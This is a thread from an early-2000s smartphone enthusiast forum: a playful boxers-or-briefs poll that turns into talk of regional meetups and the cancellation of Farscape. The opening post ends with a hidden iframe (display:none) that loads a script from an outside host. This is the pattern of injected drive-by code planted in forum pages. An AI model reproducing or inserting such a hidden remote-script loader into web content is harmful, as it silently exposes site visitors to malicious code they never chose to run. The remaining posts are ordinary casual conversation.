Poll: What's Your Choice & Why?

+ Reply to Thread
Page 1 of 3 1 2 3 LastLast
Results 1 to 20 of 44
  1. #1
    Registered User
    Join Date
    03-01-2002
    Posts
    442

    Boxers or Briefs?

    boxers here.

    i like the freedom and the breeze as i fly around pollenating.
    :p <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    iBug
    mac osx usernew beetle pilotpowerbook operatorsmartphone communicator

    __________________
    kyocera6035 on V

  2. #2
    Elf
    Elf is offline
    Registered User
    Join Date
    07-29-2002
    Posts
    13
    Think I'd look a bit silly in either, what with being a girl and all that :crazya

  3. #3
    Registered User
    Join Date
    03-01-2002
    Posts
    442
    Originally posted by Elf
    Think I'd look a bit silly in either, what with being a girl and all that :crazya
    umm...

    there's nothin' sexier than a hot little gal-pal in my boxers.

    iBug
    mac osx usernew beetle pilotpowerbook operatorsmartphone communicator

    __________________
    kyocera6035 on V

  4. #4
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    chicks in boxers...(evil Grin)...


    elf, you need to come out to our regional smartphone enthusiasts get together the next time we have one! it would be cool to have a lady representing!

  5. #5
    Mod-Blog's SmartPhone Correspondent
    Join Date
    08-18-2002
    Location
    Shelton, CT USA
    Posts
    559
    Elf, This Mad Scientist is happy to see another FARSCAPE fan on the site, too. How can they possibly cancel a show of such quality? I say equal rights for Muppets!!!


  6. #6
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by marctronixx
    chicks in boxers...(evil Grin)...


    elf, you need to come out to our regional smartphone enthusiasts get together the next time we have one! it would be cool to have a lady representing!
    Yeah, we need some female representation in the group! Although I think my g/f will be getting a 7135 also :drink1

    Doesn't it seem like there are more people from the DC area here than anywhere else?
    Please visit my picture site: Robert-O-Rama :)

  7. #7
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    I have kind of a mix of everything.... I kinda prefer boxer briefs :boing
    Please visit my picture site: Robert-O-Rama :)

  8. #8
    Registered User
    Join Date
    10-12-2002
    Location
    Central NJ
    Posts
    1,145
    Originally posted by Robert K.
    I have kind of a mix of everything.... I kinda prefer boxer briefs :boing
    Same goes for me.
    www.treobits.com
    (News, Internet Radio, Software/Hardware Store, Ringtones, Wallpaper, and more...)

  9. #9
    Elf
    Elf is offline
    Registered User
    Join Date
    07-29-2002
    Posts
    13
    Originally posted by marctronixx
    elf, you need to come out to our regional smartphone enthusiasts get together the next time we have one! it would be cool to have a lady representing!
    Just tell me where and when and I'll be there! Although it's been a while since anyone called me a lady :lol3

    Originally posted by nomad7674
    Elf, This Mad Scientist is happy to see another FARSCAPE fan on the site, too. How can they possibly cancel a show of such quality? I say equal rights for Muppets!!!
    How they can cancel Farscape while continuing to broadcast "Crossing Over with John Edward" is one of the eternal mysteries. Apparently they've already put Pilot in a box. As if that wasn't bad enough, they haven't put Rigel in a box! The Save Farscape rallies are this weekend, I'm going to be out of town so can't make it to the DC rally, but they're going on all over the country. (Would someone knock me off this soapbox now please?)




  10. #10
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by Elf
    Just tell me where and when and I'll be there! Although it's been a while since anyone called me a lady :lol3
    Cool! Marc & Dave, we'll have to arrange another get together soon and try to get all of the DC area people out there :drink1
    Please visit my picture site: Robert-O-Rama :)

  11. #11
    Registered User
    Join Date
    03-01-2002
    Posts
    442

    alienation

    Originally posted by Robert K.
    Cool! Marc & Dave, we'll have to arrange another get together soon and try to get all of the DC area people out there :drink1
    all this talk makes me feel really ALIENated. :alieneyes

    i guess i won't get to play since i'm down south.

    iBug
    mac osx usernew beetle pilotpowerbook operatorsmartphone communicator

    __________________
    kyocera6035 on V

  12. #12
    Mod-Blog's SmartPhone Correspondent
    Join Date
    08-18-2002
    Location
    Shelton, CT USA
    Posts
    559
    Hey, Bug - we New Englanders are left out, too. So you Southerners and us Northerners can all feel alone together.

  13. #13
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Hey, if you guys want to take a road trip you're welcome to join us :drink1

    Or, why doesn't everyone just move to DC... that would make things much easier to coordinate
    We'll create our own city called Kyoville :boing
    Please visit my picture site: Robert-O-Rama :)

  14. #14
    Registered User
    Join Date
    07-01-2002
    Posts
    130
    Originally posted by Robert K.
    Cool! Marc & Dave, we'll have to arrange another get together soon and try to get all of the DC area people out there
    Well I am in VA Beach and would make the 3 hour drive to DC for a get together.

    And oh, briefs, boxers or "commando" all depending on the situation =)
    Aloha!
    CGordonn

  15. #15
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by cgordonn
    And oh, briefs, boxers or "commando" all depending on the situation =)
    "commando" is the way to go once the work day is done :clap
    Please visit my picture site: Robert-O-Rama :)

  16. #16
    Mod-Blog's SmartPhone Correspondent
    Join Date
    08-18-2002
    Location
    Shelton, CT USA
    Posts
    559
    You know, User Groups are usually called -UGs like MUG for Macintosh, etc. I wonder if we should use a slightly different name in honor of originator of this thread:

    internet = i
    B = Buddy
    User = U
    Group = G

    So this meeting in DC could be called:

    The Washington DC meeting of the
    Kyocera i.B.U.G.

  17. #17
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by nomad7674
    You know, User Groups are usually called -UGs like MUG for Macintosh, etc. I wonder if we should use a slightly different name in honor of originator of this thread:

    internet = i
    B = Buddy
    User = U
    Group = G

    So this meeting in DC could be called:

    The Washington DC meeting of the
    Kyocera i.B.U.G.
    lol :b_mirror :boing
    Please visit my picture site: Robert-O-Rama :)

  18. #18
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    hey Dr. DW... you need to get the next ball rolling on the next get together! we now have chicks!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! :0

  19. #19
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by marctronixx
    hey Dr. DW... you need to get the next ball rolling on the next get together! we now have chicks!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! :0
    Yeah buddy!!! :clap ... and this time we leave the wives/girlfriends at home (haha, just kidding!) :drink1
    Please visit my picture site: Robert-O-Rama :)

  20. #20
    Oh When that Shark Bites! LBOCEAN's Avatar
    Join Date
    05-23-2002
    Location
    Long Beach, Ca
    Posts
    953
    I like em' form fitt'en myself. So'es nothing falls out and hits the ground

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts